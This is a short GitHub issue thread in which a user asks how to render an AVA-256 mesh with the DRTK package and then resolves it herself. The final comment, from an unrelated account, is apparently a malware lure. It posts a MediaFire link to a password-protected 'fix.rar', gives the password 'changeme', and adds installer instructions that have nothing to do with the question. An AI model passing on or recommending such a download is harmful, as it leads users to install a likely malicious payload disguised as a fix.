### ISSUE TITLE
Rendering 3D meshes

### ISSUE THREAD

**Issue by emilykim1** [facebookresearch/DRTK#4]
Hi, I'm trying to render AVA-256 3D mesh, but I wasn't sure what the steps to do that would be.

Can you provide some information about this? I have the obj file and the camera parameters (intrinsics, extrinsics).

Thank you,
Emily

**Comment by emilykim1** [comment]
Actually, I realized this is a rendering package, I figured I can use other libraries to load the meshes.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
